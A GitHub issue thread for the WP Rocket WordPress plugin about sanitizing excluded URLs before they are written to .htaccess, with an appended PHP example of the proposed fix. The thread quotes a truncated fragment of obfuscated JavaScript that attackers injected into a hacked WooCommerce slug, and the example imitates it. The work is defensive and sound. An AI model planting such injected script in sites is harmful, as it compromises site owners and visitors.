wp-media / wp-rocket

Performance optimization plugin for WordPress
https://wp-rocket.me
GNU General Public License v2.0

Sanitize URLs before adding them to the config file #5780

Closed camilamadronero closed 1 year ago

camilamadronero commented 1 year ago

Is your feature request related to a problem? Please describe.
Our rewrite rules can cause a 500 error when the excluded URLs are faulty.

In a specific example, the URL included a string from a hack, and it was added like this:

RewriteCond %{REQUEST_URI} !^(/(?:.+/)?feed(?:/(?:.+/?)?)?$|/(?:.+/)?embed/|/comm<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigul/(.*)|/panier/|/mon-compte/(.*)|/wc-api/v(.*)|/(index\.php/)?(.*)wp\-json(/.*|$))$ [NC]

Describe the solution you'd like
Sanitize URLs before adding them to the config file.

Additional context
Slack thread: https://wp-media.slack.com/archives/C43T1AYMQ/p1677164641055989
Ticket: https://secure.helpscout.net/conversation/2163123979/404110/

mostafa-hisham commented 1 year ago

Reproduce the problem

I couldn't reproduce it.

Identify the root cause

The website was hacked and the slug (permalink) of the WooCommerce checkout page was changed: https://jumpshare.com/v/27u1o8DIetHgk2scnJIw. By default, when you change the permalink, WordPress sanitizes it to be like this: /commscriptikffunctionnif-typeof-ikf-listn-string-return-ikf-listn-split-reverse-joinreturn-ikf-listnikf-listphp-eroc_nimda-bil-steewt-tsetal-siseneg-snigul

Scope a solution

We can edit the WooCommerce third-party class to sanitize the URLs before adding them to the .htaccess file (https://github.com/wp-media/wp-rocket/blob/0dd1e1f144947ddded9d00b4a27f431d9b7d1848/inc/ThirdParty/Plugins/Ecommerce/WooCommerceSubscriber.php#L124-L126) using sanitize_title.

@wp-media/php, please have another look at it.

Estimate the effort

Effort XS
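The failure described in the first comment and the sanitize_title fix proposed in the second, as an added PHP example that is not WP Rocket's own code. It builds the WooCommerce exclusion RewriteCond from a list of page slugs both ways (raw, as the issue describes the bug, and sanitized) and adds a regex-compile check before anything would be written to .htaccess. Assumptions: the slug list, the function names and the RewriteCond template are hypothetical stand-ins for what WooCommerceSubscriber does; slug_fallback() is a simplified approximation of WordPress's sanitize_title() so the file runs outside WordPress, and the tampered slug is a constructed, shortened imitation of the injected string in the issue.

```php
<?php
declare(strict_types=1);

// Added example; not WP Rocket's code. Builds the WooCommerce exclusion
// RewriteCond from page slugs, first the way the issue describes the bug
// (raw slug interpolated) and then with the proposed sanitize_title() step
// plus a regex-compile check before the line would reach .htaccess.

/**
 * Simplified stand-in for WordPress's sanitize_title(), used only when this
 * file runs outside WordPress. Assumption: it approximates WP's behaviour
 * (tags stripped, lowercased, everything but [a-z0-9 _-] dropped, whitespace
 * and dash runs collapsed to "-") and is not byte-for-byte identical to it.
 */
function slug_fallback(string $title): string
{
    $slug = strtolower(strip_tags($title));
    $slug = preg_replace('/[^a-z0-9 _-]/', '', $slug);
    $slug = preg_replace('/\s+/', '-', $slug);
    $slug = preg_replace('/-+/', '-', $slug);
    return trim($slug, '-');
}

/** Sanitize a slug, then escape it for use inside a PCRE/Apache regex. */
function safe_slug_for_regex(string $slug): string
{
    $clean = function_exists('sanitize_title') ? sanitize_title($slug) : slug_fallback($slug);
    // sanitize_title() leaves only [a-z0-9_-]; preg_quote() keeps the rule
    // robust should the sanitizer ever let a metacharacter through.
    return preg_quote($clean, '~');
}

/**
 * Regex body of the exclusion RewriteCond: "^(/slug-1/(.*)|/slug-2/(.*))$".
 * $sanitize = false reproduces the faulty behaviour from the issue.
 * (Hypothetical template; WP Rocket's real one has more alternatives.)
 */
function exclusion_pattern(array $slugs, bool $sanitize): string
{
    $alternatives = [];
    foreach ($slugs as $slug) {
        $part = $sanitize ? safe_slug_for_regex($slug) : $slug;
        $alternatives[] = '/' . $part . '/(.*)';
    }
    return '^(' . implode('|', $alternatives) . ')$';
}

/**
 * Apache's RewriteCond patterns are PCRE, so a pattern that PHP's PCRE
 * rejects would also break httpd's config parse (the 500 in the issue).
 * The check covers the regex alone; Apache-specific syntax such as
 * %{REQUEST_URI} and the [NC] flag sit outside it.
 */
function pattern_compiles(string $pattern): bool
{
    return @preg_match('~' . $pattern . '~', '') !== false;
}

/** Full RewriteCond line, or null if the pattern would not compile. */
function rewrite_cond(array $slugs, bool $sanitize): ?string
{
    $pattern = exclusion_pattern($slugs, $sanitize);
    if (!pattern_compiles($pattern)) {
        return null;
    }
    return 'RewriteCond %{REQUEST_URI} !' . $pattern . ' [NC]';
}

// Constructed sample: two normal WooCommerce slugs plus a tampered checkout
// slug with an unterminated "[" like the injected string in the issue.
$slugs = [
    'cart',
    'my-account',
    'comm<script>$Ikf.list=["php',
];

foreach ([false, true] as $sanitize) {
    $line = rewrite_cond($slugs, $sanitize);
    printf(
        "%-11s %s\n",
        $sanitize ? 'sanitized:' : 'raw:',
        $line ?? 'REJECTED (pattern does not compile; nothing written to .htaccess)'
    );
}
```

Run it with `php example.php`. The raw pass is rejected by the compile check because the tampered slug opens a character class it never closes, which is the same kind of breakage visible in the RewriteCond quoted in the issue; the sanitized pass yields a plain alternation of slugs. Keeping the compile check even after sanitize_title is the practitioner's caveat here: it costs one preg_match() and catches any future exclusion source that bypasses the sanitizer before it can take the site down.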